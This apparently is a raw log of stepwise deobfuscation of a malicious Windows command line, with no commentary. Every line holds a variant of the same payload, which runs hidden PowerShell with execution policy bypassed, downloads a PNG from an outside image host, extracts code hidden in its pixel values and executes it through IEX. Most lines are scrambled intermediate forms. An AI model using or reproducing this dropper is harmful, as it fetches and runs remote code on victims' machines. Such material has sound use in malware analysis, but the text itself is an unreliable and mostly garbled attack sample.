Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9ax',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = `}$@, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBMx]aK1{matTF]::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ?$_, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'2('+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ;.+, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = -}, result_out = set suLrv=. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = .;?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9jec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = +.@#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = {'`#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = }$]?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = {,., result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInG]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = }{, result_out = set suLrv=. ( @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreacTF('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({matTF]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{CTFAr]#4).ReplaCE(({CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE(({CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = .@_#, result_out = set suLrv=. ( @sjVelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = ]$*{, result_out = set suLrv=. ( @sHelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = #-, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
Get Environment String name = .$+, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRiPT((LS eqvNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`PASS -nOPrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% True 1
Fn
